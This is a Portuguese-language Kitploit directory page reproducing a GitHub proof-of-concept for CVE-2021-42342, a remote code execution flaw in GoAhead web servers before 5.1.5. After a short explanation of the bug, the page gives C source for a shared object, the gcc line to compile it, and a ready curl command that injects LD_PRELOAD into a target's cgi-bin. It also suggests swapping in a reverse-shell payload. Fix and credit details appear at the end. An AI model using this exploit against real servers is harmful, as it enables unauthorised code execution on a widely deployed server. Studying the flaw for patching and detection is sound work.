Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
goahead-webserver-pre-5.1.5-RCE-PoC-CVE-2021-42342- — Um pequeno PoC para o RCE recente encontrado no Goahead Webserver anterior à versão 5.1.5. | Kitploit
Ferramentas/GitHubGitHub/kimusan/goahead-webserver-pre-5.1.5-rce-poc-cve-2021-42342-
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubkimusan/goahead-webserver-pre-5.1.5-rce-poc-cve-2021-42342-

goahead-webserver-pre-5.1.5-RCE-PoC-CVE-2021-42342-

Um pequeno PoC para o RCE recente encontrado no Goahead Webserver anterior à versão 5.1.5.

Ver Repositório
2342há 4 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Goahead webserver (pré-v5.1.5) PoC de RCE (CVE-2021-42342)

Um bug recente no Goahead Webserver foi descoberto por William Bowling, que leva a RCE no servidor explorado.

O problema existe antes da versão 5.1.5 que, de acordo com a Shodan, cobre cerca de 2,8 milhões de servidores na internet.
Um CVS está disponível agora [https://nvd.nist.gov/vuln/detail/CVE-2021-42342]

O RCE é causado pelo fato de que, se o filtro de upload de arquivos estiver habilitado, o usuário pode enviar arquivos e ao mesmo tempo definir variáveis de formulário do usuário.

Essas variáveis acabam se tornando variáveis de ambiente do SO. Normalmente isso não é um problema, pois em casos normais de upload de formulário, as variáveis de ambiente recebem o prefixo CGI_ (padrão). No entanto, se o filtro de upload de arquivos estiver habilitado, um erro no código faz com que esse prefixo seja omitido = RCE instantâneo via variáveis de ambiente + arquivo.

Criando um objeto compartilhado simples

O código a seguir apenas imprimirá "Hellow World" no servidor remoto, mas poderia ser qualquer coisa, na verdade:

root@kitploit:~
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
static void before_main(void) __attribute__((constructor));

static void before_main(void)
{
    write(1, "Hello World!\n", 14);
}

Compile com:

root@kitploit:~
gcc -fPIC -shared -o poc.so poc.c -nostartfiles

Explorando o servidor

Agora estamos prontos para enviar nosso arquivo para o servidor. Isso pode ser feito usando o curl:

root@kitploit:~
curl -X POST  http://[TARGET]/cgi-bin/ -F "LD_PRELOAD=/proc/self/fd/0" -F file='@poc.so;encoder=base64'

altere [TARGET] para o domínio/IP do servidor de destino.

Você provavelmente verá um erro do servidor, mas tente com outro objeto compartilhado que, por exemplo, faça um callback para você com um shell legal 👍

Correção

Uma correção foi lançada com o goahead 5.1.5 aqui: [https://github.com/embedthis/goahead/issues/305]

Créditos

O problema foi inicialmente encontrado por Willian Bowling, do time Perfect Blue CTF. Durante o pbCTF 2021, um desafio era a versão existente na época (5.1.4) do servidor goahead e, juntamente com o Kalmarunionen CTF Team, encontramos o mesmo problema 0day no código (ainda não divulgado aos autores).

Baixar ferramenta